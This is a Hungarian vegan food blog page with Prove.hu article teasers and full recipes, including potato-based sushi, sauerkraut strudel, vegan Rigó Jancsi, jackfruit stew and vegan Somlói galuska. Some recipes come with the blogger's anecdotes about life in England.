Több mint száz szakértő, köztük geofizikusok, oceanográfusok, meteorológusok, mérnökök, közgazdászok, matematikusok, történészek, filozófusok és őslakos vezetők osztják meg tudásukat és tapasztalataikat a Klímakönyvben. A céljuk, hogy felkészítsenek bennünket az éghajlati katasztrófa elleni harcra. Sokan a legátfogóbb pillanatképnek tartják a Greta Thunberg svéd klímaaktivista által szerkesztett könyvet, amely a teljesség igényével és minden részletre kiterjedően mutatja… The post November 15-én jelenik meg Greta Thunberg klímakönyve magyar nyelven appeared first on Prove.hu.
Ez a vegán ifjúsági regény tökéletes őszi olvasmány lehet
2023. október 21. Prove - a világ vegán szemmel
Kántor Kata NyomoZOOk című könyve igazi vegán ifjúsági regény. Egy aktivista lány, Saci nyomoz két társával, Attilával és Tónival. A tét pedig igencsak nagy: ha sikerrel járnak, az három kihalással fenyegetett faj túlélését jelentheti. Új ifjúsági regény jelent meg NyomoZOOk címmel a magyar könyvpiacon, amelyben megjelenik a vegánság és a biodiverzitás témaköre is. Utóbbitól nem… The post Ez a vegán ifjúsági regény tökéletes őszi olvasmány lehet appeared first on Prove.hu.
Vegán miso ramen leves őszi zöldségekkel
2023. október 17. Prove - a világ vegán szemmel
Ha unod a sima zöldséglevest, ez a recept neked való: íme a japánok testet és lelket melengető, fermentált szójapasztával, azaz misóval készített erőlevese, a ramen. A hidegebb hónapokban nincs, ami jobban esne, mint egy tál forró leves, és erre nem csak a számtalan melegítő, gazdag magyar leves a bizonyíték. Tőlünk keletebbre ráadásul amellett, hogy legalább… The post Vegán miso ramen leves őszi zöldségekkel appeared first on Prove.hu.
Hiányzol, Marius - egy film az állatkertek valóságáról
2023. október 10. Prove - a világ vegán szemmel
A koppenhágai állatkert fiatal zsiráfjának tragikus sorsa ihlette Becz Péter filmjét, a Hiányzol, Mariust. Az alkotás számos állatjogi kérdést vet fel, bár célja nem az volt, hogy ezekre magyarázatot adjon. Tabuk nélkül kíván egy nehéz témáról beszélni. A boncasztalon hófehér bundájú farkas fekszik. A boncmester határozott mozdulatokkal választja el a puha szőrzetet a hústól, majd… The post Hiányzol, Marius - egy film az állatkertek valóságáról appeared first on Prove.hu.
Hatékony regeneráció: ezekkel a trükkökkel és étrenddel maximalizálhatod a hatást
2023. szeptember 16. Prove - a világ vegán szemmel
A mai rohanó világban hajlamosak vagyunk elfeledkezni a pihenés és regeneráció fontosságáról. Könnyen változtathatunk ezen, és hatékonyabbá is tehetjük néhány tudományosan is igazolt praktikával. Ez a cikk a Magyar Egészségmegőrzési és Életmódorvostani Egyesület (MOTE) közreműködésével készült. A regeneráció a szervezet azon képessége, hogy pihenőidőben megújuljon, és a korábban megterhelt rendszereket optimálisan hozzáigazítsa a korábbi (edzés)… The post Hatékony regeneráció: ezekkel a trükkökkel és étrenddel maximalizálhatod a hatást appeared first on Prove.hu.
Krumplis sushi
Magyarországon tombol a kánikula, Angliában pedig a szél. Míg a szigetlakók örülnek ha élvezhetnek legalább 20 fokot, a magyaroknak szépen kijut a 30 fok feletti hőmérsékletből. A következő recept praktikusan a nagy melegben is gyorsan elkészíthető. Vihetjük munkába, utazásra, strandra, stb. Ha a krumplipüré csak krumpliból készül, kisebb az esély, hogy megromlik a nagy melegben. Amikor ezt elkészítettem, vittem ebédre a munkahelyemre, látták a kollégáim és tetszett nekik a "kreativ" ötlet, hogy krumplipüré legyen a szusi alapja. Mielőtt bárki első reakciója az lenne, hogy biztos nem tudom, a sushi szó igazából sós rizset jelent, ne aggódjon, tisztában vagyok vele, de jobb nevet nem találtam. Szóval ahogy a névből és a képekből is adódik, egy nagy csavart tettem a legutóbb általam készített sushin, méghozzá rizs helyett krumplipürét használtam hozzá. Egész jó lett. Könnyen összeáll így is. Különlegessé tettem, hogy az egyik tekercsbe párolt fodros kel leveleket tettem, a másikba pedig nyers spenót leveleket, és ezekre halmoztam rá a paprikát, uborkát. Jó hír hogy ez tényleg cukormentes (sokan a sushi rizsbe tesznek cukrot), gluténmentes (vannak, akiknek a rizs nem egészen tud az lenni). Ahogy kedvünk tartja szójaszósszal is ízesíthetjük, vagy ehetünk hozzá savanyított gyömbért, esetleg wasabit. A recept Hozzávalók: - Néhány darab Nori lap (szárított alga lap) - Szabadon választott zöldségek, pl uborka, paprika - Pár szem krumpli a krumplipüréhez. Elkészítés: Krumplipüré elkészítése: Főzzük meg a krumplit sima vízben héjában vagy felszeletelve sós vízben jó puhára, mad villával vagy krumplinyomóval törjük össze. Szükség esetén sózhatjuk, esetleg adhatunk hozzá 1 dl növényi tejet, ha túl száraz lenne, Én nem adtam hozzá semmit, a krumpli tökéletesen összeált pürébe. A nori lapot érdemes bambusz tekercsre fektetni. Az egyik végénél elkezdjük krumplipürét vékonyan rákenni, majd a zöldségszeleteket is a krumplira helyezzük. Lehet paprika, répa, gomba, uborka, avokádó - csak hogy néhány ötletet adjak. Kb. a 3/4 részét a nori lapnak megtöltjük, majd szimplán a krumplipürés végétől szorosan feltekerjük. Tálalás előtt felszeleteljük.
Vegetáriánus kalandozás a magyar konyhában
Hamarosan ebook formátumban! Ha vegetáriánus vagy, vagy csupán szeretnéd egészségesebben elkészíteni a megszokott magyaros ételeket, akkor neked szól Hémangi új szakácskönyve. -54 klasszikus magyaros recept - vegetáriánus módon -a hús elhagyásával sem lesznek az ételek kevesebbek, minőségi fogásokat kapsz -többféle ötletet meríthetsz a hús pótlására -kipróbált receptek, olyan egyszerűen leírva, hogy még te is el tudod készíteni -garantáltan azt kapod, ami a képen látsz -30 különleges színes ételfotó 64 színes oldalon – A kerttől a konyháig szakácskönyvben megszokott színvonalas megjelenésben Lapozz bele:
Tunki-tunki!
Egyre könnyebb Magyarországon is a vegán életformát követni, hiszen számos olyan alapanyag elérhető, aminek a beszerzése 5 vagy 10 éve még lehetetlennek tűnt. Ráadásul már nem csak a bioboltok árulják ezeket a termékeket, hanem szinte az összes nagyobb élelmiszerlánc poltjain találhatók pl. borsófehérje alapú felvágottak, virslik, hamburgerhúsok. Azonban a nehézséget még mindig az jelenti, milyen […]
Káposztás-krumplis rétes
Ez a recept a fejemből pattant ki a "mi van itthon, amiből főzzek?" kérdés alapján. A hűtőben pihent rétes lap, savanyú káposzta, az élés kamrából krumpli, a zöldséges tálról pedig egy paprika került hozzá. A vicces dolog az, hogy hála az Olio appnak, ezek közül csak a réteslapokat kellett vásárolnom, a többit pedig ingyen gyűjtöttem be. Tudom, hogy Magyarországon is van néhány város, ahol már működik ez az app, de sajnos a nagyobb áruházláncok még nem használják, pedig akár arra is alkalmas lenne, hogy ezek a cégek minél inkább "karbon-semleges" (carbon-negative) cégekké váljanak. Egyrészt a lejáratközeli termékek nem a kukában végzik, hanem felajánlják a közösségnek. A felajánlást pedig önkéntesek viszik haza, hirdetik meg és kínálják ingyen "begyűjtésre" a lakóközösség (bizonyos kerületben élők) számára. Másrészt a széndioxid kibocsátást is csökkentik, mivel azok az emberek, akik begyűjtik, ahogy mondtam egy bizonyos terület lakóközössége, így akár gyalogosan is el lehet sétálni ezekhez az önkéntesekhez az igényelt ingyenes dolgokért. Karácsony tájékán rengeteg krumplihoz (közel 10 kg, és nem csak nekem jutott), répához, fehérrépához jutottam így, de máskor is "van fenn" banán, mandarin, alma, vágott virág, stb., persze akkor nem ilyen mennyiségben. Kevésbé egészséges ételek is megosztásra kerülnek, pékáruk, néha hús- és tejtermékek. Persze nem csak ezek az áruházláncoktól önkéntes begyűjtők tesznek fel étel és nem-étel hirdetéseket, hanem szimplán magánszemélyek, akik valamiktől meg akarnak válni, és ingyen kínálják. Vannak, akik táskát, ruházatot, gyermekeknek játékokat, lakásdíszeket raknak fel, de olyan is akad, aki élelmiszert. Már én is hirdettem és kínáltam több mindent így ingyenes begyűjtésre. Megörültem, amikor láttam, valaki savanyú káposztát tett fel, elég különleges számba megy itt, mivel nem annyira elterjedt itt Angliában. Tehát ez a recept nem jött volna létre (legalább is most nem és így nem,) ha nincs az Olio. A recept Hozzávalók - 3 réteslap - olaj - 4-5 db főtt krumpli - 10 dkg savanyú káposzta - csipetnyi őrölt fekete bors - 1 kápia vagy kaliforniai paprika (elhagyható) Elkészítés Az első réteslapot enyhén nedves konyharuhára leterítjük és kevés olajjal és egy ecsettel átkenjük. Ráhelyezzük, rásimítjuk a második réteslapot és ugyanígy beolajozzuk. Ráhelyezzük, rásimítjuk a harmadikat is, de ezt már nem olajozzuk be. A főtt krumplit összetörjük, a paprikát apró darabokra vágjuk és az egészet összekeverjük, miközben hozzáadjuk és hozzákeverjük a savanyú káposztát, majd egy csipetnyi (vagy talán kettő) fekete borssal megfűszerezzük. Mivel a savanyú káposzta amúgy is sós, nem igazán raktam hozzá sót, de ha sósabban étkezel, talán egy keveset adhatsz hozzá. A rétes egyharmadára rásimítjuk a káposztás-krumplis tölteléket, majd a nedves konyharuha segítségével felcsavarjuk és óvatosan sütőpapíros tepsibe fektetjük. Kb 20 perc alatt aranyszínűre sütjük. Fogyasztható meleg sós reggeliként vagy valamilyen főzelékhez, vagy akár uzsonnára is.
Rigó Jancsi (vegán)
Sütemény, ami személynevet hordoz? Nem véletlenül. Ki is volt Rigó Jancsi? Rigó János (Pákozd, 1858. augusztus 23. - New York, New York, 1927. február 3.) az egyik legismertebb cigányprímás, aki ötévesen már hegedűt vett a kezébe. A tanítótól lopott húrokat hozzá, amiért az esperes kérésére bocsánatot kért. E gesztusáért nála maradhattak a számára nagy kincsek. Ezután órák hosszat gyakorolt mindennap a szabadban: az erdő, a nádas világa hálás közönség volt: egymásnak muzsikáltak. Ez a sütemény a nevét tehát Rigó Jancsi híres magyar cigányprímásról kapta. Milyen történet fűződik a prímás nevéhez? Ő az, aki elcsábította és feleségül vette Clara Ward, Caramane-Chimay hercegnőt, az amerikai milliomos E. B. Ward egyetlen lányát, aki Joseph Caraman-Chimay belga herceg felesége volt. Jancsi és Clara 1896-ban találkozott, amikor Rigó Jancsi egy párizsi étteremben játszott, ahol Clara férjével, Joseph herceggel vacsorázott. 1896 és 1898 között az újságok sokat foglalkoztak a prímás és a hercegnő házasságával. A tortát az azt készítő cukrász Rigó Jancsi és a romantikus szerelmi történet tiszteletére nevezte el. A recept Hozzávalók a piskótákhoz - 32 dkg liszt - 3 dkg kakaópor - 15 dkg eritritol vagy gyümölcscukor - 1 tsk vanília - 2 tsk sütőpor - 2 evőkanál olaj - 1,5 evőkanál narancslé - 1,5 dl növényi tej Elkészítés: Fogunk egy tálat, összekeverjük benne először a száraz hozzávalókat, majd hozzákanalazzuk a növényi tejet és étolajat és hozzáadjuk a narancslevet. Csomómentesre keverjük majd egy sütőpapírral bélelt tepsibe öntjük. Előmelegített sütőben kb. 20 percig sütjük. Tűpróbával ellenőrizzük, ha beleszúrjuk a piskóta közepébe, és nem ragad rá, megsült a piskótánk. Amikor a piskóta kihűlt, közepén kettévágjuk (mint a tortákat) és megtöltjük a csokis tejszínes krémmel. A két piskóta lap közé minél vastagabb krémet érdemes kenni. Amikor a krémet az alsó lapra kentük, óvatosan ráhelyezzük a felső piskóta lapot, majd ráöntjük és elegyengetjük a folyékony csokit a tetején. Ekkor érdemes kockákra vágni és a hűtőbe betenni. Hozzávalók a csokis krémhez - 5 dl növényi tejszínhab - 5 dkg vegán csoki (pl tortabevonó) vagy 5 dkg cukrozatlan kakaópor - ízlés szerint eritritol (porrá őrölt) vagy más édesítő - lehetőleg por alapú és nem folyékony - csoki mellett elhagyható A növényi tejszínt kemény habbá verjük. Magyarországon a Meggle termékei között találsz növényi tejszínt, amit süteményekhez használhatsz. Másik megoldás konzerves kókusztejet pár órára fagyasztóba tenni vagy egy éjszakára hűtőbe és felrázás nélkül felbontás után a kemény réteget lekanalazni róla és habverővel habbá verni. Most azonban kipróbáltam az Elmlea double cream-et. Mivel először használtam és tartottam tőle, hogy hosszú távon megőrzi a hab a szilárdságát, kevertem hozzá 1-2 kanál útifű maghéjat (psylikum husk). Amikor már kezd a krém habbá verődni, hozzácsurgatjuk a nem forró olvasztott csokit vagy a kakaó port. Másik megoldás, hogy a tejszínt először kikeverjük az olvasztott csokival majd alaposan lehűtjük és utána verjük csokis habbá. Hozzávalók a csokis tetejéhez - 10 dkg étcsoki (vegán) - pár csepp olaj Vízgőz felett megolvasztjuk a darabokra tört csokit és hogy még folyékonyabb legyen, pár csepp olajat csepegtetünk bele.
Fodros kel krumplival
Tudtad, hogy a mélyzöld színben pompázó fodros kelkáposzta szuper táplálék, "superfood". Szerencsére ez egy olyan növény, amiért nem kell országhatárokat átlépni például sem magyarnak, sem angolnak. Európa nagy részén termelik és megterem. Magyarországon is kezd egyre jobban elterjedni a kertekben, piacokon. Tehát az ökológiai lábnyom fodros kel étellel kisebb lesz. Miért szeretem a fodros kel-t? Tele van egészségünket, szervezetünket építő és fenntartó vitaminokkal, ásványi anyagokkal és antioxidánssal, a kalóriája viszont nagyon alacsony és igazi rost forrás. Kalcium, kálium, vas, foszfor, C-vitamin, B-vitamin - csak hogy néhányat említsek azokból, amikben gazdag. Sokan rák-megelőző diétában teszik rendszeressé. Spenóthoz képest oxálsav tartalma lényegesen kevesebb. Külön előnyös, hogy hideg hónapokban (októbertől február végéig) van az igazi szezonja, bár melegebb időszakokban is találhatunk üzletekben, piacokon. A recept Hozzávalók: néhány szem közepes méretű krumpli pár szál fodros kel (levél) só 4-5 gerezd fokhagyma víz Elkészítés: A krumplikat megpucoljuk, megmossuk és felkockázzuk. Annyi sós vízben megfőzzük amennyi épp ellepi. Amíg fő, elkészítjük a káposztát. A fodros kelkáposzta leveleket megmossuk majd széltében felszeleteljük. Tapadás mentes edényben kevés vízen megpároljuk. Kis sóval meghintjük majd adunk hozzá apróra vágott vagy összezúzott fokhagymát. A megfőtt krumplit és a megpárolódott zöld leveleket csak szimplán összekeverjük. Melegen tálalva igazán finom, de langyosan és hidegen is képesek voltunk falni, mert nagyon finom és laktató. Ha száraznak találjuk, növényi joghurtot vagy tejfölt tehetünk a tetejére.
Padlizsán legyező (vegán)
Nemrégiben Birminghamban jártunk. Nem tudom ki, hogy van vele, de ha eljutok egy városba, ahol még nem jártam, a piac az, amit örömmel megnézek. Zöldség - gyümölcs piac. Különösen, ha egy másik országba jutok el. Nos amint mondtam, egy nyári napon Birminghamban jártunk, első utunk a belvárosi piacra vitt. Végre London után ismét olyan piacon jártunk, ahol sok árus volt és más-más dolgokat is árultak, nem mind ugyanazt. A mi városkánkban is van piac, de nem ilyen nagy. Mivel itt többen árultak mini padlizsánokat, így nem hagyhattam ki. Amúgy is a padlizsánoknak most van idénye. Persze nem kell a bébi padlizsánokért Birminghambe menni, hiszen láttam ezt már több helyen. Városunkban van néhány keleti üzlet, ahol ázsiai és mediterrán országok (török, görög, olasz) ételeit árulják. Ezekben a boltokban is találunk ezekből az apró padlizsánokból. Igaz, Birminghamban egy csomót adtak mindössze ?1-ért. Nem hagyhattam ki. A következő receptet nagyobb padlizsánból is el lehet készíteni, tehát ha Magyarországon a mini padlizsán nem elterjedt, nem kell legyinteni, a padlizsán legyező nagyobbacska padlizsánnal is elkészíthető. Könnyed vacsora vagy ebéd, fogyasztható körettel, bár mi nem ettünk mellé mást, a tofunak és a rostoknak köszönhetően laktató étel. A recept Hozzávalók: - Néhány darab padlizsán - Néhány szem paradicsom - 1 füstölt tofu - só - bazsalikom (opcionális) - olaj (opcionális) Elkészítés: A padlizsánokat megmossuk, hosszában szeleteket vágunk bele, de a tetejét egyben hagyjuk, hogy legyezőhöz hasonlóan kissé szét tudjuk teríteni. Besózzuk a padlizsán húsát és egy tálcán pihentetjük őket. Nedvességet fog ereszteni. Közben a paradicsomokat és füstölt tofut felszeleteljük. Amikor a padlizsánok már ,,vizet eresztenek, letöröljük róluk papírtörlővel, vagy kevés vízzel leöblítjük. Ezt követően a padlizsánok legyezői közé teszünk paradicsomszeleteket és füstölt tofu szeleteket felváltva. Sütőpapírral bélelt tepsibe fektetjük őket. Ha szaftosabban ennénk, pár csepp olíva olajat tehetünk rájuk, de ha zsiradékmentes táplálkozást folytatunk, ezt el is hagyhatjuk. 200 fokos sütőben kb 15percig sütjük. Sütőből kivéve szórhatunk rá friss vagy szárított bazsalikom levelet.
Jackfruit pörkölt (vegán)
Amikor rövid ideig Londonban éltünk, gyakran láttam zöldségeseknél egy igen nagy növényt, dinnyére hasonlító mérettel, olyan tüskésnek tűnő küllemmel, héjjal, de nem tudtam mire való, nem is igazán nyomoztam vagy kérdeztem utána. Amikor már elköltöztünk Londonból és letelepedtünk Southamptonban, akkor számomra szinte felrobbant vele az internet, rengeteg cikk és recept jött velem szemben a jackfruittal. Akkor jöttem rá, hogy az a növény, amit a londoni árusoknál láttam tulajdonképpen jackfruit. Mi is az a jackfruit? Magyaroknál jákafa néven is ismert. A jackfruit egy olyan fa termése, ami a trópusi éghajlatú vidékeken, Ázsia, Afrika és Dél Amerika egyes részein terem. A gyümölcshús ,,rózsákra szedhető. A gyümölcs textúrájának, szerkezetének köszönhetően hasonlít a főtt hús szálaira, ezért előszeretettel használják vegán és vegetáriánus konyhákban. Sárga, narancssárga és zöld húsú egyedekről van tudomásom. Hamarosan itt a húsvét és ha azon gondolkozol szeretnél valami különlegeset készíteni, de meglehetősen gyorsan, akkor a következő recept segítségedre lehet. Itt Angliában a Jackfruit eléggé elterjedt már a vegán ételek kínálatában. Pizzéria láncok gyakran használják fel amolyan hús pótlóként a vegán pizzák feltételeként. Kóstoltam egynémelyiket, de nem adott fergeteges ízélményt. Még régebben vettem leértékelt, BBQ szószban pácolt jackfruitot, serpenyőben kisütve naggggyon finom volt. Ez adta az ötletet, hogy milyen lehet, ha pörköltnek főzöm meg. Egy kisebb csavart tettem a receptbe, méghozzá adtam hozzá egy csipetnyi fahéjat és 100%-os szőlőlével öntöttem fel (itt a Lidl-ben lehet kapni, mindössze 1 fontért). Mi nem fogyasztunk alkoholt, de szerettem volna, ha valami különleges íze lesz. A fahéj és a szőlőlé karakteres ízt adott a jackfruitnak. A recept Hozzávalók: - 1 konzerv jackfruit - 2 evőkanál víz - 1/2 evőkanál ételízesítő - 1 evőkanál őrölt pirospaprika - nagyobb csipetnyi őrölt füstölt pirospaprika - 1-2 csipetnyi fahéj (elhagyható) - 1 nagy fej vöröshagyma - 4 gerezd fokhagyma - 2 evőkanál paradicsompüré - 2-3 dl 100%-os szőlőlé vagy must Elkészítés: A felaprított hagymákat kevés vízen üvegesre pároljuk. A jackfruit konzerv levét leszűrjük, majd a megpárolódott hagymára tesszük. Megszórjuk ételízesítővel, a kétfajta fűszer paprikával és átforgatjuk, majd felöntjük szőlőlével. A megpucolt fokhagymákat felszeleteljük, vagy fokhagyma présen átnyomjuk és hozzátesszük a pörkölthöz. Hozzáadunk némi paradicsompürét és az első rottyanásig összefőzzük. A főzés végén a bátrabbak adhatnak hozzá egy csipetnyi fahéjat. Éppen csak egy keveset, hogy az étel ízét inkább emelje, sem, mint ellen hangsúlyozza. Igény esetén tehetünk hozzá őrölt borsot. Mi nokedlival fogyasztottuk. A képre kattintva még több fotót láthatsz a jackruit pörköltről: Képre kattintva néhány fotó a jackfruitról:
A boszorkányság az, hogy porból meg vízből olyan terméket készítsünk, mint az igazi
A magyar helyett egyből az amerikai piacot igyekszik meghódítani a Plantcraft, a hazai cég növényi alapú pástétomával díjat nyert a szakma világkiállításán. De mit keresnek vegán termékeikkel egy húsüzemben? Miért jó az, ha egy növényi szalámi megszólalásig hasonlít az eredetire? És miért éppen Amerika?
Töltött tök (vegán, gluténmentes)
Számtalan módon lehet a csinos, kisméretű tököket megtölteni. Szerintem a legjobb kiinduló pont a "mi van a kamrában/konyhában", vagy éppen mit kíván a család. Nálunk babos-szójás étel volt a kívánság, amihez kapóra jött ez a néhány kerekded tököcske, még szintén Magyarországról jutottunk hozzájuk. Laktató és ízletes egytál étel. Tök helyett cukkinivel is elkészíthető. A recept Hozzávalók: - 2-3 kisebb méretű nyári tök - 1 hagyma - 1 bögre szójagranulátum - 1,5 bögre bab - 2 nagyobb paradicsom vagy 2 kanál paradicsomszósz - fűszerpaprika - ételízesítő - fokhagyma - sajt (opcionális) Elkészítés: Először is a szójagranulátumot forró sós (vagy akár fűszeres) vízben legalább egy fél órát áztatjuk, de akár egy éjszakát is. Ha erre nincs idő, akkor kicsit főzni érdemes. Amikor már puha és a hagymás alap kész a szószhoz, akkor leszűrjük. A tököket megmossuk, majd félbe vágjuk őket. Ha kis tököcskék, akkor nagy valószínüséggel zsenge tökök. Belsejükből kikanalazzuk a magvas részét, amit a későbbiekben a töltelékhez fel is használhatunk. A tök belsejét besózzuk és állni hagyjuk, míg a töltelék elkészül. A hagymát megpucoljuk és apróra vágjuk. Egy kevés vízen üvegesre pároljuk. A hagymára rárakjuk az előzőleg puhára főzőtt babot (vagy babkonzervet is haszálhatunk), a szóját, a tök zsenge belsejét, majd megszórjuk ételízesítővel, paprikával, jól átkeverjük. Szükség esetén egy kis vizet öntehetünk alá. Hozzáadjuk az apróra vágott paradicsomot, vagy kb. 2 ek paradicsomszószt, a szintén apróra vágott fokhagymát és addig főzzük, míg rottyan egyet. Sűrűbb szószt kellene kapjunk. Ha túl híg, keverhetünk hozzá még főtt babot vagy kukoricát, esetleg előre megfőzőtt valamilyen gabona-félét (köles, rizs, quinoa). A besózott tök ez idő alatt némi levet engedett, azt felitatjuk papírral vagy leöntjük róla. Az elkészült sűrű szósszal megtöltjük a tököket, tepsibe tesszük és 180 fokon kb 30 percig sütjük. A sajtot az utolsó pár percben szórjuk rá. Melegen tálaljuk. Főtt krumplit adhatunk hozzá, de magában is fogyaszthatjuk.
Sült paprika tojás nélkül
Nagyon sok magyar ételt elkészítettem már hús és tojás nélkül, most következzen egy népszerű nyári étel, a tojásos sült paprika tojásmentes változata. Hozzávalók: 3 ek olaj 8-10 paprika feldarabolva 3/4 kk asafoetida 1 csapott kk füstölt pirospaprika fél kk kurkuma 3 l tejből paneer (elkészítése...
Somlói galuska vegán módra
Aki igazán ismer, tudja, hogy a somlói galuska a kedvenc sütim (ha lehet egyátalán sütinek hívni). Mikor még nem vegánul étkeztünk, egyik télen meglehetősen sok somlói galuskát készítettem. Az volt az ajándékom a család tagjainak karácsonyra. Több tálcával készítettem akkor. Karácsony elmúltával pedig szilveszterre is elkészítettem a baráti társaságnak, akikkel együtt töltöttük az évzáró idejét. Most eljött az ideje, hogy a blogon is megosszam a vegán somlói galuska receptjét. Szerintem szuper, hogy nem kell hozzá tojás, sem tej, ízben mégsem marad el a cukrászdákban készített somlóitól. Amúgy annyi módon rakják össze a somlóikat, hogy ahány ház annyi szokás, tapasztalatom szerint. Én is már több módon csináltam. Most egy egyszerűbb verzió receptjét hoztam, ahol nem kell külön megsütni a 3 különböző piskótát. Tuti sikert kínál az ünnepi asztalon, legyen az húsvét vagy karácsony, esküvő, vagy születésnap. Magyarország egyik legkedveltebb édességét vegán módon is elkészíthetjük. Ha érdekel, honnan ered a somlói galuska, akkor csak a múlt század közepéig kell visszatekinteni. Az 1950-es évek végén a Gundel étterem legendás főpincére, Gollerits Károly újításként adta be a somlói galuskát. Gollerits 16 évig volt a Gundel étterem vezető főpincére, a megvalósítás azonban Szőcs József Béla cukrászmester érdeme volt, aki a Gerbeaud cukrászdában töltött tanulóévek után került a Gundelbe. Az új desszerttel az 1958-as brüsszeli világkiállításon nagy sikerrel és szakmai díj elnyerésével szerepelt. A nevet is ő adta a süteménynek, méghozzá a fóti Somlyó nevű 288 méter magas dombról, amely a Gödöllői-dombság legnyugatibb nyúlványa, amelynek lábánál évtizedek óta élt a közeli Kisalag városrészben, ahol később a saját cukrászdája is működött. Somlói azért lett a neve, mert Brüsszelben valaki véletlenül lehagyta az ipszilont a díjnyertes somlyói-galuska desszert nevéből, így végül somlói-galuska névvel került a gasztronómiába. (Forrás Wikipédia) A piskóta receptje Hozzávalók: - 3x17 dkg fehér liszt - 3x8 dkg teljes kiőrlésű liszt - 3x3-4 evőkanál nyírfacukor - 3x14 evőkanál növényi tej - 3x2 evőkanál étolaj - 3x1 kisebb citrom vagy 1 fél narancs kifacsart leve - 3x1/2 teáskanál szódabikarbóna Továbbá: - 2-3 evőkanál kakaópor (vagy karobpor) - 1-2 dl örölt dió - kurkuma és vanília Elkészítés: A somlói tésztájának az elkészítése történhet úgy, hogy sütünk 3 különböző piskótát (egy kakaós, egy diós és egy vaníliás) piskótát külön külön, vagy - ahogy legutóbb én csináltam - rövidebb idő alatt a három külön kikevert tésztát egymásra folyatva egybe sütjük meg. A piskóta vagy piskóták elkészítése: Fogunk egy tálat, összekeverjük benne először a száraz hozzávalókat, majd hozzákanalazzuk a növényi tejet és étolajat és hozzáadjuk a citrom/narancs levét. Csomómentesre keverjük majd egy sütőpapírral bélelt tepsibe öntjük. Előmelegített sütőben kb. 20 percig sütjük. Tűpróbával ellenőrizzük, ha beleszúrjuk a piskóta közepébe, és nem ragad rá, megsült a piskótánk. Csoki puding: Hozzávalók: - 10 dkg kakaópor vagy karobport - 12 dkg étkezési keményítő (kukorica) - 5 dl növényi tej (zab vagy szója tej is megteszi) - 10 dkg édesítő szer mint például erithritol, gyümölcs cukor vagy agavé- vagy juharszirup - 1 teáskanál vanília-kivonat Elkészítés: A tejből kb. 3 dl felteszünk forrni. Közben a kakaóport és az étkezési keményítőt egy nagyobb pohárban vagy mérőedényben a hideg tejjel csomómentesre keverjük. Amikor már szinte forr a növényi tej, folyamatosan keveréssel hozzáadjuk a kikevert keményítős tejet és az édesítő szert. Addig kevergetjük és forraljuk, amíg puding állagúra besűrűsödik. Vanília puding: Hozzávalók: - 12 dkg étkezési keményítő - 5 dl növényi tej (zab vagy szója tej is megteszi) - 10 dkg édesítő szer mint például erithritol, gyümölcs cukor vagy agavé- vagy juharszirup - 2-3 teáskanál vanília-kivonat vagy vanília arom - csipetnyi kurkuma Elkészítés: A tejből kb. 3 dl felteszünk forrni. Közben a kurkumát és az étkezési keményítőt egy nagyobb pohárban vagy mérőedényben a hideg tejjel csomómentesre keverjük. Amikor már szinte forr a növényi tej, folyamatosan keveréssel hozzáadjuk a kikevert keményítős tejet és az édesítő szert. Addig kevergetjük és forraljuk, amíg puding állagúra besűrűsödik. Kurkuma gyönyörű sárgás színt ad a pudingnak, de legyünk óvatosak vele, mert az ízét is megváltoztathatja. A somlói galuska összeállítása: A kihűlt piskótát kis darabokra vágjuk, majd egy szép tálban (pl. jénai) egymás mellé helyezve lefektetjük őket. Ezt megöntjük a csokis puding egy részével majd átkeverjük és egy kanállal kissé belenyomkodjuk a tál aljába a pudingos piskóta darabokat. Megszórjuk durvára tört dióva és mazsolával (meggy is jó helyette - akár aszalva, befőtt, fagyasztott). Erre ráöntjük a vanília pudingot és egyenletesen elkenjük. A tetejét megszórjuk kakaó- vagy karob porral. Tejszínhabbal díszitjük. Már sok helyen kaphatók növényi tejszínek, amelyek alkalmasak hab verésre, számomra még mindig a legegyszerűbb megoldás a konzerves kókusztejet pár órára fagyasztóba tenni vagy egy éjszakára hűtőbe és felrázás nélkül felbontás után a kemény réteget lekanalazni róla és habverővel habbá verni. A tejszínhab tetejére kakaó/karobpor, édesítő és kevés víz összeforralásából készült öntetet önthetünk. Ez el is maradhat. A piskótát akár elkészíthetjük napokkal, hetekkel előre és fagyasztóba téve, akkor vesszük elő, amikor a vendégeknek a somlóit el szeretnénk készíteni, hiszen ekkor már csak a pudingokat kell főzni és összeállítani egy tálban. Ha lefagyasztás mellett döntünk, érdemes sütőpapírba csomagolni, majd fagyasztós zacsiba/dobozba tenni. Amikor elővesszük, egyszerűen csak meleg helyen kell tárolni (pl fűtőtest mellett vagy fűtőtesten) és szépen kienged.
Káposztasaláta répával (vegán)
Coleslaw (magyarul káposzta saláta) vagy amerikai káposzta saláta, ami származását tekintve talán nem is amerikai, hanem holland. Akármelyik ország is kezdte, elmondhatjuk, hogy ahány ország annyiféle káposzta saláta. A németek olajjal és ecettel készítik és akár almát, alkalmanként hagymát is adnak hozzá. Az angolok káposztasalátája gyakran gazdagodik répával, esetleg hagymával és mindenképpen majonézesen, tejfölösen készítik. Készen is árulják, a legtöbb üzletben lehet már venni és a veganuár óta Lidl és Aldi is hozta a vegán coleslaw-t. Egyiket meg is kóstoltam, de igazából inkább ecetesebb ízvilágot éreztem, sem mint lágy, krémeset. Némely angol konyhában adnak hozzá mazsolát vagy diót, esetleg sajtot. Mazsolával még el tudom képzelni, de inkább maradok az egyszerúbb verziónál. Viszont ecet helyett mindenképp frissen facsart narancslevet ajánlok. Nem is kell hozzá sok narancs, egy is elég. C-vitaminban gazdag étel ami alkalmas pirítós kenyérhez, kovásztalan kenyérhez (pászkához) vagy kísérőként főételekhez, pörköltekhez, sült, rántott dolgokhoz. Hozzávalók: - Fél fej fehér káposzta - Fél fej lila káposzta - 2 szál sárgarépa - 3 ek vegán majonéz - 2 ek (dijoni) mustár - 2-3 dl növényi joghurt - 1/4 citrom vagy narancs leve - só - mazsola (opcionális) Elkészítés: A káposztákat lereszeljük majd megsózzuk, átforgatjuk őket jó alaposan. Nem sok sót kell adni hozzá, csak éppen megszórni kicsit, és jól átforgatni. Pihentetjük fél órát - órát, hogy levet engedjen. Közben lereszeljük a sárgarépát és összeállítjuk az öntetet a salátához. A joghurtot összekeverjük a mustárral és majonézzel. Sima mustárt használtam, aminek kevesebb az ecettartalma. A káposzta, ha kis levet engedett, kinyomkodjuk a levét, majd összekeverjük a joghurtos szósszal. A legvégén csepegtettem rá narancsot, ami szerintem igazán jó ízt kölcsönzött neki. Férjem anélkül kérte. Ha tehetjük 1 órát, de akár egy éjszakát állni hagyjuk. Tálalásnál akár mazsolával is megszórhatjuk. Nagyobb mennyiséget készítettem, egy részét azonnal megettük, másik részét másnapra eltettem. Hűtőben néhány napig eláll.
Túrós burek
